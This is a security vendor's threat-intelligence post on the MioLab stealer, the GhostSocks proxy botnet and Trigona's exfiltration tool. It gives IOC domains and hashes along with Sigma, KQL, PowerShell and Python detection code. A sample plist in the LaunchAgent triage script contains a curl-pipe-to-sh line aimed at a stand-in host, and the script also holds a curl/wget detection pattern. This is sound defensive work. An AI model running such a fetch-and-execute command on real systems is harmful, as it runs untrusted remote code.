
MioLab Stealer, GhostSocks Proxy Botnet, and Trigona Exfil Tool: OTX Pulse Analysis — Enterprise Detection Pack

Security Arsenal Team
May 4, 2026
5 min read

Threat Summary

Recent OTX pulse data highlights a convergence of Malware-as-a-Service (MaaS) offerings, each targeting a different vector for financial gain and data theft. We are tracking three active campaigns:

  1. MioLab (Nova): A macOS-centric stealer ecosystem aggressively marketed on Russian underground forums, focusing on cryptocurrency wallet extraction.
  2. GhostSocks: A Go-based proxy botnet that converts infected devices into residential proxy nodes. It is often distributed alongside Lumma Stealer, and it wraps its SOCKS5 tunnels in TLS so the proxy traffic blends in with ordinary HTTPS.
  3. Trigona: A ransomware affiliate group using a custom exfiltration tool, uploader_client.exe, in place of commodity utilities such as Rclone. It splits uploads into parallel streams and rotates connections to stay under large-transfer thresholds in network monitoring.

Collectively, these campaigns indicate a shift toward specialized tooling designed to bypass standard EDR and network perimeter defenses.

Threat Actor / Malware Profile

MioLab (Nova) Stealer

  • Type: macOS Stealer (MaaS)
  • Distribution: Advertised on Russian-speaking forums; suspected delivery via "ClickFix" social engineering or malicious browser extensions.
  • Behavior: Targets browser credentials, cookies, and over 200 cryptocurrency extensions/wallets.
  • C2/Infrastructure: Uses bulletproof hosting infrastructure with specific domain patterns for data exfiltration.

GhostSocks

  • Type: Residential Proxy Botnet / Stealer Loader
  • Language: Go
  • Behavior: Establishes SOCKS5 proxies on infected hosts; uses TLS encryption to blend malicious traffic with legitimate web traffic. Partners with Lumma Stealer for dual-payload monetization.
  • Evasion: Utilizes residential proxy IPs to hide attacker origin, making geo-blocking and IP reputation checks less effective.

Trigona Affiliates

  • Type: Ransomware / Extortion
  • Tooling: Custom Go-based exfiltration tool (uploader_client.exe).
  • Behavior: Uploads over 5 parallel connections and rotates each connection after 2,048 MB, so no single TCP session carries the whole data set and per-session volume heuristics are not tripped.
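
The rotation pattern above is what network detection should key on. Below is an added example, written for this page rather than taken from the pulse or from Trigona's tooling: it scans flow records for a host that sends many same-sized (about 2,048 MB) connections to one destination with several of them open at once. The flow records are constructed, and the field names ts, te, src, dst and orig_bytes follow Zeek conn.log naming as an assumption about what the reader's telemetry provides.

```python
"""Flag hosts that exfiltrate in rotated, fixed-size parallel connections.

Trigona's uploader_client.exe reportedly opens 5 parallel streams and
rotates each connection after 2,048 MB. A single huge upload is easy to
baseline; a run of same-sized uploads to one destination, several at a
time, is the signal this script looks for in flow records.
"""
from collections import defaultdict

CHUNK = 2048 * 1024 * 1024  # 2,048 MB, the rotation size described in the pulse

# Constructed Zeek-style flow records (not real telemetry): one row per TCP
# connection with start/end epoch seconds and bytes sent by the originator.
FLOWS = [
    # victim -> staging host: 5 chunks of ~2 GiB open at once, then a final partial chunk
    {"ts": 1000, "te": 1400, "src": "10.0.5.23", "dst": "203.0.113.9", "orig_bytes": CHUNK + 1_024},
    {"ts": 1001, "te": 1405, "src": "10.0.5.23", "dst": "203.0.113.9", "orig_bytes": CHUNK - 2_048},
    {"ts": 1002, "te": 1398, "src": "10.0.5.23", "dst": "203.0.113.9", "orig_bytes": CHUNK + 512},
    {"ts": 1003, "te": 1410, "src": "10.0.5.23", "dst": "203.0.113.9", "orig_bytes": CHUNK},
    {"ts": 1004, "te": 1402, "src": "10.0.5.23", "dst": "203.0.113.9", "orig_bytes": CHUNK - 100},
    {"ts": 1399, "te": 1800, "src": "10.0.5.23", "dst": "203.0.113.9", "orig_bytes": 700_000_000},
    # backup server: one 10 GiB upload in a single session, not chunked
    {"ts": 2000, "te": 9000, "src": "10.0.9.2", "dst": "198.51.100.4", "orig_bytes": 10 * 1024**3},
    # developer pushing two ~2 GiB artifacts one after the other: too few chunks, not parallel
    {"ts": 3000, "te": 3300, "src": "10.0.7.7", "dst": "198.51.100.8", "orig_bytes": CHUNK},
    {"ts": 3400, "te": 3700, "src": "10.0.7.7", "dst": "198.51.100.8", "orig_bytes": CHUNK + 10},
]


def max_concurrency(intervals):
    """Largest number of intervals open at the same instant (sweep line)."""
    events = []
    for start, end in intervals:
        events.append((start, 1))
        events.append((end, -1))
    events.sort(key=lambda e: (e[0], e[1]))  # at a tie, close (-1) before open (+1)
    current = peak = 0
    for _, delta in events:
        current += delta
        peak = max(peak, current)
    return peak


def find_rotated_exfil(flows, chunk=CHUNK, tolerance=0.01, min_chunks=3, min_parallel=2):
    """Return one finding per (src, dst) pair that shows chunked, parallel uploads.

    A flow counts as a chunk when its originator byte count is within
    `tolerance` of `chunk`. The last connection of a transfer is usually a
    partial chunk; it is not counted as a chunk but its bytes go into the total.
    """
    by_pair = defaultdict(list)
    for f in flows:
        by_pair[(f["src"], f["dst"])].append(f)

    lo, hi = chunk * (1 - tolerance), chunk * (1 + tolerance)
    findings = []
    for (src, dst), group in by_pair.items():
        chunks = [f for f in group if lo <= f["orig_bytes"] <= hi]
        if len(chunks) < min_chunks:
            continue
        parallel = max_concurrency([(f["ts"], f["te"]) for f in chunks])
        if parallel < min_parallel:
            continue
        findings.append({
            "src": src,
            "dst": dst,
            "chunk_connections": len(chunks),
            "max_parallel": parallel,
            "total_gb": round(sum(f["orig_bytes"] for f in group) / 1024**3, 2),
        })
    return findings


if __name__ == "__main__":
    for hit in find_rotated_exfil(FLOWS):
        print(f"[!] {hit['src']} -> {hit['dst']}: {hit['chunk_connections']} x ~2 GiB chunks, "
              f"up to {hit['max_parallel']} in parallel, {hit['total_gb']} GiB total")
```

Only the first host is reported: the backup server's single 10 GiB session never matches the chunk size, and the developer's two sequential artifacts are below the chunk count and never overlap. Tune `tolerance` upward if your flow collector rounds byte counts, and lower `min_chunks` when hunting a short time window.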

IOC Analysis

The provided indicators of compromise (IOCs) consist primarily of C2 domains, hostnames, and binary hashes (MD5, SHA1, SHA256).

  • Domains (MioLab): mioisiskwowiwjowuwjwolab.club, officerelaxation.com, approve-me.com (the Sigma rule below also carries marinemember.com). These should be blocked immediately at the DNS layer.
  • Domains (GhostSocks): retreaw.click, w2.bruggebogeyed.site. Likely bot registration or C2 endpoints. The second is a hostname, so match on the registered domain bruggebogeyed.site to catch sibling hosts.
  • File Hashes: Multiple hashes (MD5, SHA1, SHA256) for uploader_client.exe (Trigona) and GhostSocks binaries; the SHA256 values are the ones used in the rules below.

Operational Guidance: Load the hashes into EDR as custom indicators for both blocking and retrospective scanning. Add the domains to RPZ (Response Policy Zone) files and web proxy blocklists, covering subdomains (a wildcard entry) as well as the apex. The hashes belong to Windows PE binaries (uploader_client.exe and the GhostSocks loader); a hash is a hash, so a hit on a non-Windows device is the same file, staged or transferred rather than executed natively, and is worth a look rather than a dismissal. No MioLab hashes are provided, so MioLab coverage rests on the DNS and network indicators.
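
The domain indicators above need to be matched on label boundaries, both in the hunt and in the RPZ zone: a substring match on approve-me.com also fires on notapprove-me.com and on approve-me.com.cdn.example, which are different registered domains. As an added example (not the pulse's own tooling), the following Python runs the pulse's domain list over a constructed DNS query log in a hypothetical "<epoch> <client> <qtype> <qname>" line format, shows the difference between the two matching rules, and emits the RPZ records for the domains and their subdomains.

```python
"""Match DNS query logs against the pulse's domain IOCs and emit RPZ records.

Two matching rules are shown side by side: plain substring matching, which is
what a `contains` modifier does, and label-boundary matching (the domain itself
or any subdomain of it), which is what an RPZ zone enforces and what a hunt
should use so that lookalikes and unrelated names do not fire.
"""

# Domains from the pulse, keyed to the campaign they belong to. The hostname
# w2.bruggebogeyed.site is covered by its registered domain.
IOC_DOMAINS = {
    "mioisiskwowiwjowuwjwolab.club": "MioLab",
    "officerelaxation.com": "MioLab",
    "approve-me.com": "MioLab",
    "retreaw.click": "GhostSocks",
    "bruggebogeyed.site": "GhostSocks",
}

# Constructed DNS query log (not real telemetry): "<epoch> <client_ip> <qtype> <qname>"
DNS_LOG = """\
1715000001 10.0.5.23 A w2.bruggebogeyed.site
1715000002 10.0.5.23 A retreaw.click.
1715000003 10.0.8.14 A notapprove-me.com
1715000004 10.0.8.14 AAAA approve-me.com.cdn.example
1715000005 10.0.3.3 A OfficeRelaxation.COM
1715000006 10.0.3.3 A www.example.org
"""


def normalize(name):
    """Lower-case and drop the trailing dot that resolvers log on FQDNs."""
    return name.strip().lower().rstrip(".")


def substring_match(qname, iocs=IOC_DOMAINS):
    """`contains` semantics: also fires on notapprove-me.com and approve-me.com.cdn.example."""
    q = normalize(qname)
    return next((d for d in iocs if d in q), None)


def ioc_match(qname, iocs=IOC_DOMAINS):
    """Label-boundary semantics: qname equals the IOC domain or is a subdomain of it."""
    q = normalize(qname)
    return next((d for d in iocs if q == d or q.endswith("." + d)), None)


def hunt(log_text, matcher=ioc_match, iocs=IOC_DOMAINS):
    """Return (client_ip, qname, campaign) for every query the matcher flags."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, client, _qtype, qname = line.split(maxsplit=3)
        domain = matcher(qname, iocs)
        if domain is not None:
            hits.append((client, normalize(qname), iocs[domain]))
    return hits


def rpz_records(iocs=IOC_DOMAINS):
    """RPZ records returning NXDOMAIN (CNAME .) for each domain and all of its subdomains.

    These belong in the body of the RPZ zone, beneath its SOA and NS records.
    """
    lines = []
    for domain in sorted(iocs):
        lines.append(f"{domain}\tCNAME\t.")
        lines.append(f"*.{domain}\tCNAME\t.")
    return lines


if __name__ == "__main__":
    print("label-boundary hits:")
    for client, qname, campaign in hunt(DNS_LOG):
        print(f"  {client} queried {qname} ({campaign})")
    print("extra hits a substring rule would add (noise):")
    for hit in sorted(set(hunt(DNS_LOG, substring_match)) - set(hunt(DNS_LOG))):
        print(f"  {hit}")
    print("RPZ records:")
    print("\n".join(rpz_records()))
```

The label-boundary hunt returns three queries from two clients; the substring rule adds two more that are not the pulse's domains. The same distinction applies to the Sigma and PowerShell matching later on this page: match the registered domain as a suffix on a label boundary, never as a bare substring.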

Detection Engineering

Sigma Rules

YAML
title: Potential MioLab Stealer C2 Connection
id: 8a1b2c3d-4e5f-6789-0123-456789abcdef
description: Detects network connections from macOS hosts to known MioLab Stealer C2 infrastructure domains.
status: experimental
date: 2026-05-04
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6635a7b2c422830e00b3e1d0
tags:
    - attack.credential_access
    - attack.t1555.003
    - attack.exfiltration
logsource:
    category: network_connection
    product: macos
detection:
    selection:
        DestinationHostname|endswith:
            - 'mioisiskwowiwjowuwjwolab.club'
            - 'officerelaxation.com'
            - 'approve-me.com'
            - 'marinemember.com'
    condition: selection
falsepositives:
    - Unknown
level: high
---
title: GhostSocks Proxy Activity
id: 9b2c3d4e-5f6a-7890-1234-567890abcdef
description: Detects connections to known GhostSocks infrastructure, or outbound connections to common SOCKS proxy ports that are not expected from the host.
status: experimental
date: 2026-05-04
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6635a7b2c422830e00b3e1d1
tags:
    - attack.command_and_control
    - attack.t1090.002
    - attack.defense_evasion
logsource:
    category: network_connection
    product: windows
detection:
    selection_domain:
        DestinationHostname|endswith:
            - 'retreaw.click'
            - 'bruggebogeyed.site'
    selection_proxy:
        Initiated: 'true'
        DestinationPort:
            - 1080
            - 1081
            - 1082
    condition: 1 of selection_*
falsepositives:
    - Legitimate SOCKS proxy usage; add a filter for approved proxy clients to selection_proxy
level: medium
---
title: Trigona Custom Exfiltration Tool Execution
id: 0c3d4e5f-6a7b-8901-2345-678901bcdef0
description: Detects execution of the custom uploader_client.exe used by Trigona affiliates, by image name or by known SHA256.
status: experimental
date: 2026-05-04
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6635a7b2c422830e00b3e1d2
tags:
    - attack.exfiltration
    - attack.t1048
logsource:
    category: process_creation
    product: windows
detection:
    selection_name:
        Image|endswith: '\uploader_client.exe'
    selection_hash:
        Hashes|contains:
            - 'SHA256=e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173'
            - 'SHA256=816d7616238958dfe0bb811a063eb3102efd82eff14408f5cab4cb5258bfd019'
    condition: 1 of selection_*
falsepositives:
    - Legitimate internal tool that happens to be named uploader_client.exe (verify the hash before closing)
level: critical

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for the Trigona custom uploader (process creation) and MioLab/GhostSocks domains (network events)
let TrigonaHashes = dynamic(["e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173", "816d7616238958dfe0bb811a063eb3102efd82eff14408f5cab4cb5258bfd019"]);
let GhostSocksDomains = dynamic(["retreaw.click", "bruggebogeyed.site"]);
let MioLabDomains = dynamic(["mioisiskwowiwjowuwjwolab.club", "officerelaxation.com", "approve-me.com"]);
// 1. Process creation: match the created process by file name or SHA256.
//    FileName/SHA256 describe the new process; InitiatingProcessFileName is its parent.
DeviceProcessEvents
| where FileName =~ "uploader_client.exe" or SHA256 in~ (TrigonaHashes)
| extend Indicator = "Trigona uploader_client.exe"
| project Timestamp, DeviceName, Indicator, FileName, ProcessCommandLine, SHA256, InitiatingProcessFileName
| union (
    // 2. Network connections naming GhostSocks or MioLab domains (covers macOS devices enrolled in Defender)
    DeviceNetworkEvents
    | where RemoteUrl has_any (GhostSocksDomains) or RemoteUrl has_any (MioLabDomains)
    | extend Indicator = iff(RemoteUrl has_any (GhostSocksDomains), "GhostSocks domain", "MioLab domain")
    | project Timestamp, DeviceName, Indicator, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName
)
| order by Timestamp desc

PowerShell Hunt Script

PowerShell
<#
.SYNOPSIS
    Hunt script for Trigona Uploader and MioLab/GhostSocks Indicators.
.DESCRIPTION
    Checks running processes and the local DNS client cache for known IOCs from the OTX Pulse.
    Run elevated so that process image paths are readable for hashing.
#>

$TrigonaHashes = @(
    "e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173",
    "816d7616238958dfe0bb811a063eb3102efd82eff14408f5cab4cb5258bfd019"
)

$MaliciousDomains = @(
    "mioisiskwowiwjowuwjwolab.club",
    "officerelaxation.com",
    "approve-me.com",
    "retreaw.click",
    "bruggebogeyed.site"
)

Write-Host "[+] Hunting for Trigona uploader_client.exe processes..." -ForegroundColor Cyan
# Get-Process reports the image name without its extension, so match on the bare name
$processes = Get-Process | Where-Object { $_.ProcessName -eq "uploader_client" }

if ($processes) {
    foreach ($proc in $processes) {
        Write-Host "[!] ALERT: Found uploader_client.exe running (PID: $($proc.Id))" -ForegroundColor Red
        try {
            # $proc.Path is empty when the process cannot be opened; Get-FileHash then throws and we land in catch
            $fileHash = (Get-FileHash -Path $proc.Path -Algorithm SHA256 -ErrorAction Stop).Hash.ToLower()
            if ($fileHash -in $TrigonaHashes) {
                Write-Host "[!!!] CRITICAL: Hash matches known Trigona Exfil Tool: $fileHash" -ForegroundColor Red
            } else {
                Write-Host "[?] Name matches but hash is not in the pulse ($fileHash); collect the binary for analysis" -ForegroundColor Yellow
            }
        } catch {
            Write-Host "[-] Could not calculate hash for PID $($proc.Id) (path: '$($proc.Path)')" -ForegroundColor DarkYellow
        }
    }
} else {
    Write-Host "[-] No uploader_client.exe processes found." -ForegroundColor Green
}

Write-Host "[+] Checking DNS Cache for malicious domains..." -ForegroundColor Cyan
# The queried name is the Entry property; Data holds the resolved address or CNAME target.
# Match the domain itself and any subdomain (e.g. w2.bruggebogeyed.site) on a label boundary.
$dnsCache = Get-DnsClientCache | Where-Object {
    $entry = $_.Entry.ToLower()
    foreach ($domain in $MaliciousDomains) {
        if ($entry -eq $domain -or $entry.EndsWith(".$domain")) { return $true }
    }
    return $false
}

if ($dnsCache) {
    Write-Host "[!] ALERT: Found malicious domain entries in DNS Cache:" -ForegroundColor Red
    $dnsCache | Format-Table Entry, Data, TimeToLive -AutoSize
} else {
    Write-Host "[-] No malicious domains found in local DNS cache." -ForegroundColor Green
}

Response Priorities

  • Immediate:
    • Block the listed domains at the DNS resolver, firewall, and web proxy, and the listed hashes in EDR.
    • Isolate any endpoints identified as running uploader_client.exe or connecting to GhostSocks domains.
  • 24 Hours:
    • Reset credentials and revoke active browser sessions for high-privilege users on macOS devices: MioLab steals cookies as well as saved passwords, and a password reset alone does not invalidate a stolen session cookie. Treat cryptocurrency wallets on affected Macs as compromised.
    • Review flow logs for repeated outbound connections of roughly 2,048 MB each from one host to one external destination, several open at a time. This is the Trigona rotation pattern, and it will not show up as a single large transfer.
  • 1 Week:
    • Implement egress filtering so that endpoints can reach only approved proxies and destinations. GhostSocks wraps its SOCKS5 tunnel in TLS, so a rule on port 1080 alone will not see it.
    • Enhance macOS endpoint monitoring for unsigned binaries and persistent LaunchAgents.
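
For the last item, the LaunchAgent review, here is an added example that is not code from the pulse and does not describe MioLab's actual persistence mechanism: a Python triage of launchd job plists by what they execute. The three sample plists are constructed for the example, and the trusted path list and the example.invalid URL are assumptions, not indicators.

```python
"""Triage macOS LaunchAgent/LaunchDaemon plists for persistence worth a look.

A per-user LaunchAgent needs no privileges to drop, so the triage here is by
what the job runs: a program outside the usual installed-software paths, a
program in a hidden directory, an interpreter fed inline code, a command that
fetches from the network, or a job that keeps relaunching itself.
"""
import plistlib
import re

# Assumed baseline of where legitimately installed programs live; extend per fleet.
TRUSTED_PREFIXES = (
    "/System/", "/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/libexec/",
    "/Applications/", "/Library/Apple/",
)
INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python3", "python", "perl", "ruby"}
FETCH_RE = re.compile(r"\b(curl|wget)\b|https?://", re.IGNORECASE)


def job_argv(plist):
    """The argv launchd would run: Program (if set) followed by ProgramArguments."""
    argv = list(plist.get("ProgramArguments") or [])
    program = plist.get("Program")
    if program and (not argv or argv[0] != program):
        argv.insert(0, program)
    return argv


def triage_plist(data):
    """Return a list of findings for one plist's bytes; an empty list means nothing notable."""
    plist = plistlib.loads(data)
    argv = job_argv(plist)
    if not argv:
        return ["no Program or ProgramArguments: malformed job"]
    exe = argv[0]
    findings = []
    if not exe.startswith(TRUSTED_PREFIXES):
        findings.append(f"program outside trusted paths: {exe}")
    if any(part.startswith(".") for part in exe.split("/") if part):
        findings.append(f"program in a hidden directory: {exe}")
    if exe.rsplit("/", 1)[-1] in INTERPRETERS and any(a in ("-c", "-e") for a in argv[1:]):
        findings.append("interpreter given inline code (-c/-e)")
    if FETCH_RE.search(" ".join(argv)):
        findings.append("command fetches from the network")
    if plist.get("RunAtLoad") and (plist.get("KeepAlive") or plist.get("StartInterval")):
        findings.append("RunAtLoad with KeepAlive/StartInterval: re-launches itself")
    return findings


# Constructed sample plists (not recovered from an incident); names and paths are illustrative.
SAMPLES = {
    "com.apple.example.plist": plistlib.dumps({
        "Label": "com.apple.example",
        "Program": "/usr/libexec/example-helper",
        "RunAtLoad": True,
    }),
    "com.update.agent.plist": plistlib.dumps({
        "Label": "com.update.agent",
        "ProgramArguments": ["/bin/sh", "-c", "curl -fsSL https://example.invalid/p | sh"],
        "RunAtLoad": True,
        "KeepAlive": True,
    }),
    "com.sys.helper.plist": plistlib.dumps({
        "Label": "com.sys.helper",
        "ProgramArguments": ["/Users/alice/.config/.sys/helper", "--quiet"],
        "RunAtLoad": True,
        "StartInterval": 60,
    }),
}


def triage_all(samples=SAMPLES):
    """Map each plist name to its findings."""
    return {name: triage_plist(data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, findings in triage_all().items():
        print(f"[{'REVIEW' if findings else 'ok'}] {name}")
        for f in findings:
            print(f"    - {f}")
```

In use, feed the function the bytes of every file under ~/Library/LaunchAgents, /Library/LaunchAgents and /Library/LaunchDaemons; plistlib reads both XML and binary plists. The findings are prompts for a human, not verdicts: a vendor agent in a hidden directory is odd but not proof, whereas a shell one-liner that downloads and pipes to sh should be pulled for analysis the same day.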
